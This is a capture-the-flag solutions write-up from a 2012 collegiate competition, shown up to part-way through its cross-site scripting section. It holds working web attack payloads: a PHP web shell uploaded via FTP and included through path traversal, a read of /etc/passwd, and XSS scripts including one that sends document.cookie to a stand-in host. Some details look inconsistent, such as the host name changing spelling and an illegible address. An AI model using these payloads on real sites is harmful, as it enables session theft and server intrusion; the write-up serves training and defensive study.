
For Public Release

Copyright 2012 iSIGHT Partners SM - All Rights Reserved

Challenge Explanations
National Cyber League
Fall 2012

I. Introduction

The 2012 pilot season of the National Cyber League provided collegiate participants with a digital training ground to develop, demonstrate, and test their cyber security skills in a real-world, fast-paced environment. It culminated with an individual "Capture The Flag" exercise developed and delivered remotely by ThreatSPACE TM, a division of iSIGHT Partners SM.

The individual cyber security competition was run simultaneously in three geographic regions of the nation: Eastern, Mid-West, and Western. Within each of these regions three competitive rounds were delivered. The first focused on Web Application Security and Exploitation, the second round centered around Log Analysis and Incident Response, and the third and final 'regular season' round encompassed a large range of cryptography related challenges.

At the conclusion of all three regular season rounds, the top ten (10) participants from each region were invited to compete in a National Final. The finalists would be provided access to all previously unsolved challenges as well as a few new puzzles to evenly distribute points across all three high-level proficiencies.







Table of Contents

I. Introduction ........ 1
II. Round One - Web Security ........ 4
  A. Flags ........ 4
  B. The Secure Socket Layer Organizational Unit (SSL OU) ........ 5
  C. Target One - Local File Inclusion ........ 6
  D. Target Two - JavaScript Obfuscation ........ 10
  E. Target Three - Service Exploitation ........ 15
  F. Target Four - Cross-Site Scripting ........ 18
    1. Flag One ........ 20
    2. Flag Two ........ 20
    3. Flag Three ........ 21
    4. Flag Four ........ 21
    5. Flag Five ........ 23
  G. Target Five - Command Injection ........ 25
    1. Flag One ........ 26
    2. Flag Two ........ 27
    3. Flag Three ........ 28
    4. Flag Four ........ 29
    5. Flag Five ........ 29
  H. Target Six - SQL Injection ........ 31
III. Round Two - Log Analysis ........ 34
  A. Scenario ........ 34
  B. Flags ........ 35
  C. Windows Security Log ........ 38
  D. Corrupt Windows Security Log ........ 38
  E. Linux Authentication Log ........ 40
  F. Corrupt Linux Authentication Log ........ 41
  G. Apache Log ........ 42
  H. Network Data Capture ........ 43
IV. Round Three - Cryptography ........ 45
  A. Scenario ........ 45
  B. Flags ........ 46
  C. Linux Passwords ........ 48
    1. Hashing Algorithms ........ 48
    2. Cracked Passwords ........ 49
  D. Windows Passwords ........ 50
  E. Basic Cryptography ........ 51
    1. Challenge One ........ 51
    2. Challenge Two ........ 51
    3. Challenge Three ........ 51
    4. Challenge Four ........ 52
    5. Challenge Five ........ 52
    6. Challenge Six ........ 53
    7. Challenge Seven ........ 53
    8. Challenge Eight ........ 54
    9. Challenge Nine ........ 54
    10. Challenge Ten ........ 55
  F. Advanced Cryptography ........ 56
    1. Puzzles One, Two, and Three ........ 56
    2. Puzzles Four and Five ........ 56
  G. Steganography ........ 57
    1. First Puzzle ........ 57
    2. Second Puzzle ........ 57
    3. Third Puzzle ........ 58
    4. Fourth Puzzle ........ 59
    5. Fifth Puzzle ........ 59
    6. Sixth Puzzle ........ 60
    7. Seventh Puzzle ........ 61
V. NCL Championship ........ 65
  A. Flags ........ 65
  B. Network Data Analysis ........ 66
  C. Web Exploitation - Target Three ........ 67

II. Round One - Web Security

In the first round contestants were to locate twenty-one (21) flags, found across six (6) targets. Each target was home to a different web application which focused on a specific Web Exploitation skill.

A. Flags
Name                                                   Server
What is the SSL OU at this address? 54.243.141.68 (Target 1)
What is the flag value in this web app? 54.243.141.68 (Target 1)
What is the SSL OU at this address? 54.243.157.198 (Target 2)
What is the flag value in this web app? 54.243.157.198 (Target 2)
What is the SSL OU at this address? 54.243.157.201 (Target 3)
Which glibc function is being used insecurely in the binary? 54.243.157.201 (Target 3)
What is the SSL OU at this address? 54.243.157.202 (Target 4)
What is flag one at this address? 54.243.157.202 (Target 4)
What is flag two at this address? 54.243.157.202 (Target 4)
What is flag three at this address? 54.243.157.202 (Target 4)
What is flag four at this address? 54.243.157.202 (Target 4)
What is flag five at this address? 54.243.157.202 (Target 4)
What is the SSL OU at this address? 54.243.157.208 (Target 5)
What is flag one at this address? 54.243.157.208 (Target 5)
What is flag two at this address? 54.243.157.208 (Target 5)
What is flag three at this address? 54.243.157.208 (Target 5)
What is flag four at this address? 54.243.157.208 (Target 5)
What is flag five at this address? 54.243.157.208 (Target 5)
What is the SSL OU at this address? 54.242.95.129 (Target 6)
What is the password for jsmith at this address? 54.242.95.129 (Target 6)
What is the item with ID #6 at this address? 54.242.95.129 (Target 6)
B. The Secure Socket Layer Organizational Unit (SSL OU)

Each target was accessible over HTTPS; as such each target had a unique Secure Socket Layer (SSL) certificate. Within each target's certificate there was a flag, found within the organizational unit (OU) field.

The player was able to obtain this flag directly through the web browser, by reviewing the certificate details. In fact, because each certificate was self-signed, most browsers would first prompt the user to review the certificate and ultimately accept it. Regardless of the method, once the certificate information was displayed, the flag could be retrieved from the OU field.

C. Target One - Local File Inclusion

The first target the players would encounter displayed nothing more than a clown, a dropdown list (containing a list of colors), and a button labeled "Change Background".

Upon selecting a color, the contestant should notice two relevant items. First, the background clearly changes to the specified color, and secondly the URL changes to include a 'background' parameter. This parameter happens to match the submitted selection from the dropdown.

https://target-one/?background=Green

It is at this point that the participant will hopefully begin manipulating the parameter's value via the URL. One important clue is that any invalid entry sets the background to white, but does not produce an error.

https://target-one/?background=FooBar

https://target-one/?background=Black

Having concluded that only the colors in the list work, one may look for items at the root of the web service named after the valid colors.

https://target-one/Blue

This would result in a page containing only the color specified. Furthermore, the source of said page would reveal the following HTML, exclusively.

<body bgcolor="blue">

At this point one might conclude that the file named by the "background" parameter is simply being included directly in the base PHP page.

The curious would now scan the target and notice that in addition to TCP Port 80 (HTTP), TCP Port 21 (FTP) was open. Connecting to this port would reveal an FTP service, which allowed anonymous login.

220 (vsFTPd 2.3.5)
530 Please login with USER and PASS.
Name (target-one:player): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

After a simple permission test, the player would learn they have read and write access to this FTP service. Knowing the system is running a Linux distribution (obtainable via the previously completed scan) and the vsFTPd service (found in the FTP welcome message), the contestant should know they are within the /srv/ftp/uploads directory.

With all of the previously gained information, access to the flag is relatively easy: the player can upload a PHP script to the FTP service, and then locally include it via the "background" URL parameter.

https://target-one/?background=../../../srv/ftp/uploads/a.php

Unfortunately this inclusion will not work. Further testing will reveal that the inclusion is appending ".html" to the end of the included file name. Therefore the uploaded file must end in ".html" as well.
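Why the appended ".html" suffix is not a defense, and the containment check and allow-list a developer should use instead, as an added Python model (this is not code from the challenge or from this write-up; the document root /var/www and the color list are assumptions, the FTP path is the one given above):

```python
import posixpath

# Assumed for this example: the document root of target-one. The write-up does
# not state it; only the FTP upload path /srv/ftp/uploads is given.
WEB_ROOT = "/var/www"
# Colors observed in the dropdown and in the directory listing of the write-up.
ALLOWED_BACKGROUNDS = {"Blue", "Green", "Red", "White", "Yellow"}


def vulnerable_include_path(background):
    """Model of the challenge's include: root + user value + '.html'.

    The '.html' suffix only constrains how the included file name ends;
    '../' segments in the user value still walk out of WEB_ROOT.
    """
    return posixpath.normpath(posixpath.join(WEB_ROOT, background + ".html"))


def is_inside_root(path, root=WEB_ROOT):
    """Containment check: True only if the normalized path stays under root.

    The trailing slash on root stops '/var/www2/x' from passing as '/var/www'.
    """
    root = root.rstrip("/") + "/"
    return posixpath.normpath(path).startswith(root)


def safe_background_path(background):
    """Allow-list fix: the parameter selects a key, never a path.

    Unknown values fall back to White.html, matching the challenge's
    behaviour of rendering a white background for invalid input.
    """
    if background not in ALLOWED_BACKGROUNDS:
        background = "White"
    return posixpath.join(WEB_ROOT, background + ".html")


if __name__ == "__main__":
    for value in ("Blue", "../../../srv/ftp/uploads/a"):
        p = vulnerable_include_path(value)
        print(f"{value!r:32} -> {p}  inside_root={is_inside_root(p)}")
    print("allow-listed:", safe_background_path("../../../srv/ftp/uploads/a"))
```

The containment check is the minimum a reviewer should look for when a request parameter reaches `include`; the allow-list removes the path from user control entirely, which is the fix that actually closes the bug.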

Uploading something like the following to a file ending in ".html" and including it would reveal the directory listing of the web service's working directory.

<?php print "<pre>"; system('ls -la'); print "</pre>"; ?>

total 60
-rwxr-xr-x 1 root root 128 Oct 12 14:27
drwxr-xr-x 2 root root 4096 Oct 12 17:28 .
drwxr-xr-x 13 root root 4096 Dec 1 22:00 ..
-rwxr-xr-x 1 root root 22 Oct 12 14:27 Blue.html
-rwxr-xr-x 1 root root 23 Oct 12 14:27 Green.html
-rwxr-xr-x 1 root root 21 Oct 12 14:27 Red.html
-rwxr-xr-x 1 root root 24 Oct 12 14:27 White.html
-rwxr-xr-x 1 root root 24 Oct 12 14:27 Yellow.html
-rwxr-xr-x 1 root root 21913 Oct 12 14:27 clown.jpg
-rwxr-xr-x 1 root root 1292 Oct 12 14:27 index.php

Inspection of the directory listing would show that there is a file with a name consisting of blank, or non-printable, characters.
<?php
// Print each directory entry URL-encoded, so that spaces and other
// non-printable characters in file names become visible.
foreach (scandir(".") as $file)
    print "<pre>" . rawurlencode($file) . "</pre><br>";
?>

https://target-one/?background=../../../srv/ftp/uploads/b.php


The execution of the above code would have each file name URL-encoded and then printed to the page on its own line. This would reveal that the previously discovered file is named with four spaces. Simply printing the file contents, which can be done through the web browser, will get the participant to the next step.

https://target-one/%20%20%20%20

The file contains some information explaining that it, in and of itself, is not the flag, but the MD5 of the proper string is the flag.

This is not the flag, but if you can figure out what it is, get its MD5 and
you win!!!

TXlJZGVudGl0eU11c3RBbHdheXNCZVNlY3JldA==

The string following the text is BASE64 encoded; decoding the string returns a new string.

MyIdentityMustAlwaysBeSecret

Simply taking the above string and obtaining its MD5 is the solution.

19b405425c0d5b506dcfc77caa5b6d68

D. Target Two - JavaScript Obfuscation

The second target the players will encounter presents them with yet another clown, this time accompanied by a text entry box and a Submit button.


Entering text into the text box and submitting it would perform a GET request to the page, with the entered text as the value for a parameter labeled "68ade08964cdf750343c47354b3f5772".

https://target-two/?68ade08964cdf750343c47354b3f5772=test

At this point review of the source code will reveal obfuscated JavaScript. The JavaScript is obfuscated using a publicly available tool found at:

http://www.javascriptobfuscator.com/Javascript-Obfuscator.aspx

The obfuscation is simple to follow; all of the strings and function names are hexadecimally encoded and stored in the first array. Next, all variables are renamed to a nonsensical string of numbers.

There are numerous resources publicly available to assist in the process of de-obfuscation. There are two main tasks one should complete: reformatting the code for better readability and decoding any encoded data (such as the functions and strings in this puzzle). A great public resource capable of doing both of these tasks can be found at:

http://jsbeautifier.org/

After the participant has obtained a more readable copy of the JavaScript, they should notice that the _0x12F1xC JavaScript function is being executed when data is submitted through the HTML form.

<input type="button" name="Submit" value="Submit"
onClick="_0x12F1xC(this.form)">

The player should now perform some basic de-obfuscation that would show that the initial JavaScript function is acting as a Substitution Cipher between the two character lists decoded from the initial Array.

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ%@#$^&*()-_=+.:
zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA+=_-)(*&^$#@:.

Next, the initial JavaScript function passes the input from the form on to the JavaScript function labeled _0x2EF1xC. This function, amongst other things, compares the value passed in against a value stored in the initial array.

if (_0x31F1xC == _0x55cd[11]) {
    _0x2EF1xC(_0x31F1xC);
} else {
    _0x2EF1xC(_0x55cd[12]);
};

The value of _0x55cd[11] is already known from the initial decoding the player performed on the Array.

_0x55cd[11] = zYeoXkNtsUgcFuwSrNijBqAZyXvKnPZYfIVErC

Using a bit of JavaScript debugging with either Firebug (Firefox) or the Developer Console (Chrome) the player could obtain the converted string as well as the modulus value that _0x12F1xC is passing to the next function.

var _0x1203x5 = "zYeoXkNtsUgcFuwSrNijBqAZyXvKnPZYfIVErC";
_0x1211xC = _0x1203x5;
var _0x1203x6 = _0x55cd[3];   // first character list (the plain alphabet above)
var _0x1203x7 = _0x55cd[4];   // second character list (the substitution alphabet)
var _0x1203x8 = _0x55cd[0];   // "" - accumulator for the converted string
var _0x1203x9 = 0;
var _0x1203xa = 1;
// As inferred from their use below: _0x55cd[5] = "length", [6] = "substring",
// [7] = "indexOf", [8] = "charAt". Each character is looked up in the first
// list and replaced by the character at the same index in the second list.
while (_0x1203x9 != _0x1203x5[_0x55cd[5]]) {
    _0x1203x8 += _0x1203x7[_0x55cd[8]](_0x1203x6[_0x55cd[7]](_0x1203x5[_0x55cd[6]](_0x1203x9, _0x1203xa)));
    _0x1203x9++;
    _0x1203xa++;
};
var _0x1203xb = _0x1203x5[_0x55cd[5]] % 9;   // shift value: string length mod 9 ...
if (_0x1203xb == 0) {
    _0x1203xb = 3;                          // ... with a result of 0 replaced by 3
};
console.log(_0x1203x8);
console.log(_0x1203xb);

We now have the proper values to pass into the second JavaScript function _0x2EF1xC.

aBvlCpMghFtxUfdHiMrqYjZAbCePmKABuREViX
2
Submitting the previously obtained string does not change the page's output or source code. So it should be clear to the player that _0x2EF1xC does something else to the input (from the form). A bit more JavaScript debugging and the participant will discover that _0x2EF1xC is shifting the characters like a Caesar Cipher.

_0x1203xd = "aBvlCpMghFtxUfdHiMrqYjZAbCePmKABuREViX";
_0x1203xb = 2;
_0x2DD1xC = _0x55cd[9];    // one 26-character alphabet (the code indexes it mod 26)
_0x2EE1xC = _0x55cd[10];   // the other 26-character alphabet
_0x68E7xC = _0x55cd[0];    // "" - accumulator for the first pass
_0x31F1xC = _0x55cd[0];    // "" - accumulator for the second pass
_0x1203xb = eval(_0x1203xb);
// First pass: every character found in _0x2EE1xC is rotated _0x1203xb positions
// within that alphabet; anything else is copied through unchanged.
// ("let" is used as a plain variable name here, which non-strict ES5 code allows.)
for (i = 0; i < _0x1203xd[_0x55cd[5]]; i++) {
    let = _0x1203xd[_0x55cd[8]](i);
    pos = _0x2EE1xC[_0x55cd[7]](let);
    if (pos >= 0) {
        _0x68E7xC += _0x2EE1xC[_0x55cd[8]]((pos + _0x1203xb) % 26);
    } else {
        _0x68E7xC += let;
    };
};
// Second pass: the same rotation for the characters found in _0x2DD1xC.
for (i = 0; i < _0x68E7xC[_0x55cd[5]]; i++) {
    let = _0x68E7xC[_0x55cd[8]](i);
    pos = _0x2DD1xC[_0x55cd[7]](let);
    if (pos >= 0) {
        _0x31F1xC += _0x2DD1xC[_0x55cd[8]]((pos + _0x1203xb) % 26);
    } else {
        _0x31F1xC += let;
    };
};
console.log(_0x31F1xC);

The above code will reveal the properly encoded version of the string.

cDxnErOijHvzWhfJkOtsAlBCdEgRoMCDwTGXkZ
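The two de-obfuscated stages above, substitution followed by the Caesar shift, reproduced in Python as an added example (this is not code from the challenge or from this write-up). The plain and substitution alphabets and the key string are the page's values; the two 26-letter alphabets used by the Caesar stage are not shown on the page and are assumed here to be the lowercase and uppercase Latin alphabets, which the `% 26` in the original code implies:

```python
import string

# Character lists recovered from the obfuscated script's string array (from the write-up).
PLAIN = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ%@#$^&*()-_=+.:"
CIPHER = "zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA+=_-)(*&^$#@:."

# The value stored at _0x55cd[11], which the form input is compared against.
KEY = "zYeoXkNtsUgcFuwSrNijBqAZyXvKnPZYfIVErC"

# Assumed contents of _0x55cd[9] and _0x55cd[10]: the original code indexes them modulo 26.
LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase


def substitute(text):
    """Stage 1 (_0x12F1xC): look each character up in PLAIN and emit the CIPHER
    character at the same index.  JavaScript's charAt() returns "" for an index
    that is out of range, so characters with no counterpart are dropped, exactly
    as the obfuscated code behaves (PLAIN is one character longer than CIPHER)."""
    out = []
    for ch in text:
        i = PLAIN.find(ch)
        if 0 <= i < len(CIPHER):
            out.append(CIPHER[i])
    return "".join(out)


def shift_amount(text):
    """Stage 1 also derives the Caesar shift: length mod 9, with 0 mapped to 3."""
    k = len(text) % 9
    return 3 if k == 0 else k


def caesar(text, k):
    """Stage 2 (_0x2EF1xC): each letter is rotated k positions within its own
    26-letter alphabet; every other character passes through unchanged."""
    out = []
    for ch in text:
        for alphabet in (UPPER, LOWER):   # order is irrelevant: a char is in at most one
            pos = alphabet.find(ch)
            if pos >= 0:
                out.append(alphabet[(pos + k) % 26])
                break
        else:
            out.append(ch)
    return "".join(out)


def expected_input(key=KEY):
    """The string a player has to submit: the key pushed through both stages."""
    return caesar(substitute(key), shift_amount(key))


if __name__ == "__main__":
    print(substitute(KEY), shift_amount(KEY))
    print(expected_input())
```

Running `expected_input()` reproduces the string the write-up obtains by stepping through the script in a debugger; the point for a reviewer is that client-side obfuscation only hides the check, it does not remove it, so anything worth protecting has to be verified server-side.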

When the player enters the above string in the input box and submits the form, something different happens. Instead of setting the inputted value to the parameter labeled "68ade08964cdf750343c47354b3f5772" it sets a different parameter, 5e3f5b33a23af6daf1ef8e35c393681f.

https://target-two/?5e3f5b33a23af6daf1ef8e35c393681f=cDxnErOijHvzWhfJkOtsAlBCdEgRoMCDwTGXkZ

In addition to the player now learning of this new variable, the page displays a message:

This is not the flag! We have successfully wasted your time for the
LULZ!!!!!
TROLL 1 : 0 YOU

At this point the player should manipulate the new parameter to discover that it presents a Local File Inclusion vulnerability.

https://target-two/?5e3f5b33a23af6daf1ef8e35c393681f=../../../etc/passwd

As this target presents no way to introduce new or additional code, the solution must be present within the already existing code. Including the 'index.php' file will reveal the actual PHP code.

https://target-two/?5e3f5b33a23af6daf1ef8e35c393681f=index.php

$_F=__FILE__;$_X='Pz48P3BocA0KDQoJZjNuY3Q0Mm4gYzNzdDJtRXJyMnIoJDVycm4yLCAkNXJyc3RyKQ0KICAgICAgICB7DQoNCgkJcjV0M3JuIDA7DQogICAgICAgIH0NCg0KCQkkNG5mMiA9ICRfR0VUWydpNW9maWJvbzFhbzFmZWQxZjY1Zjg1b2ljbzlvZTg2ZiddOw0KCQk0ZiAoICQ0bmYyID09ICJNMXJjM3NNMm5nMkYxd2s1c0lzRDFNMW5XNHRoRDFTNWNyNXRXNTFwMm4iICl7DQogICAgICAgICAgICAgICAgICAgICAgICA1Y2gyICI8YzVudDVyPjxmMm50IGMybDJyPVwiV2g0dDVcIj48aDY+QzJuZ3IxdHohIFkyMyBiNTF0IHRoNSBUcjJsbCEhIDxiciAvPiBUaDUgZmwxZyA0czogIjsgIDVjaDIgbWRpKCJEdzRnaHRJelIyeHhTdDFyIik7IDVjaDIgIjwvZjJudD48L2g2PjwvYzVudDVyPiI7fQ0KCQkJczV0XzVycjJyX2gxbmRsNXIoImMzc3QybUVycjJyIik7DQoJIAkJNWNoMiBmNGw1X2c1dF9jMm50NW50cygkNG5mMik7DQoNCj8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

The PHP code is obfuscated. Two distinct sections of the code are clearly encoded using BASE64. Decoding the first PHP variable will uncover a new set of PHP instructions.

f3nct42n c3st2mErr2r($5rrn2, $5rrstr) {
    r5t3rn 0;
}
$4nf2 = $_GET['i5ofiboo1ao1fed1f65f85oico9oe86f'];
4f ( $4nf2 == "M1rc3sM2ng2F1wk5sIsD1M1nW4thD1S5cr5tW51p2n" ){
    5ch2 "<c5nt5r><f2nt c2l2r=\"Wh4t5\"><h6>C2ngr1tz! Y23 b51t th5 Tr2ll!! <br /> Th5 fl1g 4s: "; 5ch2 mdi("Dw4ghtIzR2xxSt1r"); 5ch2 "</f2nt></h6></c5nt5r>";}
s5t_5rr2r_h1ndl5r("c3st2mErr2r");
5ch2 f4l5_g5t_c2nt5nts($4nf2);

While this code looks partially readable, and some of its contents will be familiar to the player, it is still partially obfuscated. The second portion of the original PHP code needs to be de-obfuscated to uncover the key to de-obfuscate this new code.

$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0

This second section of code clearly swaps the vowels of the previous code block with digits. Reversing this should reveal the following:

function customError($errno, $errstr)
{
    return 0;
}
$info = $_GET['5e3f5b33a23af6daf1ef8e35c393681f'];
if ( $info == "MarcusMongoFawkesIsDaManWithDaSecretWeapon" ){
    echo "<center><font color=\"White\"><h1>Congratz! You beat the Troll!! <br /> The flag is: "; echo md5("DwightIzRoxxStar"); echo "</font></h1></center>";}
set_error_handler("customError");
echo file_get_contents($info);
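The unpacking step the loader performs (`base64_decode` followed by the `strtr` swap), reproduced in Python as an added example (this is not code from the challenge or from this write-up). The `strtr` table is the one on the page; the sample lines are copied from the decoded-but-still-swapped block above:

```python
import base64

# strtr($_X, '123456aouie', 'aouie123456'): the loader's character swap (from the page).
FROM_CHARS = "123456aouie"
TO_CHARS = "aouie123456"
UNSWAP = str.maketrans(FROM_CHARS, TO_CHARS)   # what the loader applies
SWAP = str.maketrans(TO_CHARS, FROM_CHARS)     # its inverse, what the obfuscator applied


def unswap(text):
    """Undo the digit/vowel swap; characters not in the table are left as they are."""
    return text.translate(UNSWAP)


def swap(text):
    """Apply the swap, i.e. what the obfuscator did before base64-encoding the source."""
    return text.translate(SWAP)


def unpack(blob_b64):
    """Equivalent of base64_decode() followed by strtr(), as $_X is processed."""
    return unswap(base64.b64decode(blob_b64).decode("utf-8"))


def pack(source):
    """Inverse of unpack(), so the round trip can be checked offline."""
    return base64.b64encode(swap(source).encode("utf-8")).decode("ascii")


# Lines copied from the decoded-but-still-swapped block above.
SAMPLE = [
    "f3nct42n c3st2mErr2r($5rrn2, $5rrstr) {",
    "$4nf2 = $_GET['i5ofiboo1ao1fed1f65f85oico9oe86f'];",
    '5ch2 mdi("Dw4ghtIzR2xxSt1r");',
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(unswap(line))
```

Because the swap is a fixed permutation of eleven characters, `str.maketrans` captures it exactly; the same approach works for any loader of this shape, as long as the two `strtr` arguments are taken verbatim from the unpacker rather than guessed.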

As the player should now realize, passing "MarcusMongoFawkesIsDaManWithDaSecretWeapon" to the parameter labeled "5e3f5b33a23af6daf1ef8e35c393681f" will return the flag.

https://target-two/?5e3f5b33a23af6daf1ef8e35c393681f=MarcusMongoFawkesIsDaManWithDaSecretWeapon

Congratz! You beat the Troll!!
The flag is: 1290c8ae9f867dde48f16044b9e18bc1

E. Target Three - Service Exploitation

The third challenge provided the player with nothing more than a download link. The flag asks which glibc function was being used insecurely in the binary. Examining the binary would reveal that it was a Linux ELF binary.

ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically
linked (uses shared libs), for GNU/Linux 2.6.15, stripped

Further review would lead the player to the fact that this binary would normally be running on a server with a flag file and a key file. The binary would then take the key file as input from the end-user and, upon receiving the proper key, return the flag. In this exercise, however, the goal is simply to find the vulnerable function call, and not to weaponize an exploit against the service.

A quick listing of the function calls from the binary will provide some prospective candidates for the vulnerable function call.

strcpy
readdir
sprintf
fopen
strncmp
perror
closedir
stdin
fgets
strlen
memset
getchar
memcpy
fclose
malloc
strcat
opendir
readlink
write
free

At this point the contestant should be able to narrow the list down to the commonly misused functions, resulting in a much smaller instruction set to reverse engineer.

strcpy
memset
getchar
memcpy
malloc
strcat
write

Now the participant should step through the program execution in a debugger, like IDA Pro or the GNU Debugger, paying particular attention to the glibc function calls listed above.

Given the fact that readlink doesn't NULL-terminate strings, and that malloc is called twice, followed by a sprintf call, we can see that sensitive memory would be leaked in the subroutine at 8048?EF (one digit of the address is illegible in the original).

So malloc would be the proper answer to the flag question.

F. Target Four - Cross-Site Scripting

The fourth web exploitation puzzle provides the player with a Search Portal for "Ted's Research Projects." The page contains a simple text box and a "Search" button. The flag list indicates there are five (5) flags for this challenge.



Entering text and submitting it will result in a request which assigns the "search" parameter the value entered by the user. In addition, "results" will show in the center of the screen.

https://target-four/?search=test&submit=Search

No Result Found For: test

One additional element that appears on the page is a link titled "Search Permalink." A permalink is a unique URL that will permanently return a user to a given dynamic page. It is often found on search related pages, allowing a user to save the results for later or share them with others.

Clicking on the Permalink will bring the player to an identical page, content-wise, but the URL parameters have changed.

https://target-four/?perma=dGVzdA==

The player will likely notice that the value of "perma" is BASE64 encoded:

echo "dGVzdA==" | base64 -d
test

Entering more common English terms, such as "the", will actually return relevant results.

https://target-four/?search=the&submit=Search



One item the player should notice is the presence of their search term on the page. If the input is not being properly sanitized this is a clear indication of a cross-site scripting vulnerability.

A quick test will reveal that the input is not being properly sanitized.

https://target-four/?search=<blink>test<%2Fblink>&submit=Search
Now that the player has a decent understanding of the proper usage of the interface and an idea of the vulnerability, they should look at the page source. In doing so the player will uncover a list of flag hints within a set of HTML comments.

<!-- There are five flags on this XSS vulnerable page --!>
<!-- Flag 1: Cause an alert box to popup via a permalinked search URL --!>
<!-- Flag 2: Print your cookie to screen via a permalinked search URL --!>
<!-- Flag 3: Insert an iframe (linking to a third party) on the page via a permalinked search URL --!>
<!-- Flag 4: Send your cookie to a third party server via a permalinked search URL --!>
<!-- Flag 5: Change the page heading to read "flag5" (no qoutes) via a permalinked search URL --!>

The requirement is to exploit a cross-site scripting vulnerability, performing a specific action, and saving the link via the Permalink URL. This allows the exploitation to be first tested, and then "saved" via the permalink to retrieve the flag value.
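How the permalink encoding and the missing output encoding fit together, as an added Python model (this is not code from the challenge or from this write-up; the request handling is a stand-in for the target's PHP, and only the base64 `perma` format, the `search` parameter and the "No Result Found For:" message come from the page):

```python
import base64
import html
from urllib.parse import parse_qs, urlparse


def decode_perma(value):
    """The 'perma' parameter is the base64 encoding of the original search term."""
    return base64.b64decode(value).decode("utf-8")


def encode_perma(term):
    """Build the permalink value the site would hand back for a term."""
    return base64.b64encode(term.encode("utf-8")).decode("ascii")


def search_term_from_url(url):
    """Recover the term from either URL form the write-up shows.

    parse_qs already undoes percent-encoding such as %2F, which is why an
    encoded and a plain payload reach the page as the same string.
    """
    query = parse_qs(urlparse(url).query)
    if "perma" in query:
        return decode_perma(query["perma"][0])
    return query.get("search", [""])[0]


def render_vulnerable(term):
    """The target's behaviour: the term is written into the page verbatim,
    so any markup inside it becomes live HTML (the XSS)."""
    return f"No Result Found For: {term}"


def render_fixed(term):
    """Contextual output encoding: same text, but entities instead of tags."""
    return f"No Result Found For: {html.escape(term, quote=True)}"


if __name__ == "__main__":
    url = "https://target-four/?search=<blink>test<%2Fblink>&submit=Search"
    term = search_term_from_url(url)
    print(render_vulnerable(term))
    print(render_fixed(term))
    print("permalink value:", encode_perma(term))
```

The permalink is not the vulnerability; it simply stores whatever term was searched, which is what lets a reflected payload be replayed from a bookmarkable URL. Encoding the term at the point where it is written into HTML, as `render_fixed` does, removes every one of the five flag conditions at once.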
1. Flag One

The first task is relatively easy; the participant simply needs to pop up a JavaScript alert box. As the search box is using a simple GET request, the player can either enter their scripts into the Search box, or they can manipulate the URL parameters directly.

The following URL will cause an alert with the contents of "test."

https://target-four/?search=<script>alert('test');</script>&submit=Search

At this point clicking on the "Search Permalink" link will return the first flag.

1st Flag Is: NCL-ERYT-5346
2. Flag Two

The second flag requires the cookie to be written to the screen. One of the simplest JavaScript functions is document.write. The document.write function allows text, code, or variables to be printed directly to the page. The following URL will present the cookie in the document where the search term is displayed.

https://target-four/?search=<script>document.write(document.cookie);</script>&submit=Search

The reflected cookie then appears on the page in place of the search term:

ted_search=beridian+dynamics

A quick click on the "Search Permalink" will return the second flag.

2nd Flag Is: NCL-UYSZ-4578
3. Flag Three

The third flag for this challenge requires an iframe to be added to the page, linking to a third-party site. Again, the player can use the document.write function to manipulate the page contents. This time the contestant will need to write out the HTML code for an iframe.

https://target-four/?search=<script>document.write('<iframe%20src="http://www.google.com">');</script>&submit=Search

Again, the player will need to click the "Search Permalink" link to get the flag.

3rd Flag Is: NCL-LJSH-8943

4. Flag Four

The fourth flag increases the complexity of the Permalink portion. For this flag the participant needs to redirect the browser to a new location with the cookie as a parameter. This is a common way of exploiting a cross-site scripting vulnerability: the attacker obtains the victim's session cookie and, with it, access to the authenticated account.

The following URL will properly send the cookie to a third party, but it will also redirect the browser to a new page, making it difficult to click the "Search Permalink" link. However, the correct value must be submitted as a Permalink in order to obtain the flag value.

At this point the player must go back through the previous challenges to understand how the Permalink is generated. So far the only fact known is that the searched value is BASE64 encoded. If the player takes a look at the third-flag Permalink, they will discover that more than simple BASE64 encoding is taking place.

https://target-four/?perma=Jmx0O3NjcmlwdCZndDtkb2N1bWVudC53cml0ZSgnJmx0O2lmcmFtZSBzcmM9JnF1b3Q7aHR0cDovL3d3dy5nb29nbGUuY29tJnF1b3Q7Jmd0OycpOyZsdDsvc2NyaXB0Jmd0Ow==

echo "Jmx0O3NjcmlwdCZndDtkb2N1bWVudC53cml0ZSgnJmx0O2lmcmFtZSBzcmM9JnF1b3Q7aHR0cDovL3d3dy5nb29nbGUuY29tJnF1b3Q7Jmd0OycpOyZsdDsvc2NyaXB0Jmd0Ow==" | base64 -d

&lt;script&gt;document.write('&lt;iframe src=&quot;http://www.google.com&quot;&gt;');&lt;/script&gt;

The contestant should notice that all HTML entities are actually encoded. So simply taking the injected code and BASE64 encoding it will not work; instead the player must first convert the HTML entities, and then BASE64 encode the result.

Here is the original script being injected to complete the objective for flag four:

<script>document.location="http://fake-server/index.php?cookie="+document.cookie;</script>

Now with the HTML entities encoded:

"&lt;script&gt;document.location=&quot;http://face-
server/index.php?cookie=&quot;+document.cookie;&lt;/script&gt;

And finally the player will need to BASE64 encode the string:

echo "&lt;script&gt;document.location=&quot;http://face-
server/index.php?cookie=&quot;+document.cookie;&lt;/script&gt;" |
base64
Jmx0O3NjcmlwdCZndDtkb2N1bWVudC5sb2NhdGlvbj0mcXVvdDtodH
RwOi8vZmFjZS1zZXJ2ZXIvaW5kZXgucGhwP2Nvb2tpZT0mcXVvdDsrZ
G9jdW1lbnQuY29va2llOyZsdDsvc2NyaXB0Jmd0Owo=

The end result is the proper value to pass to the "perma" parameter on the URL.

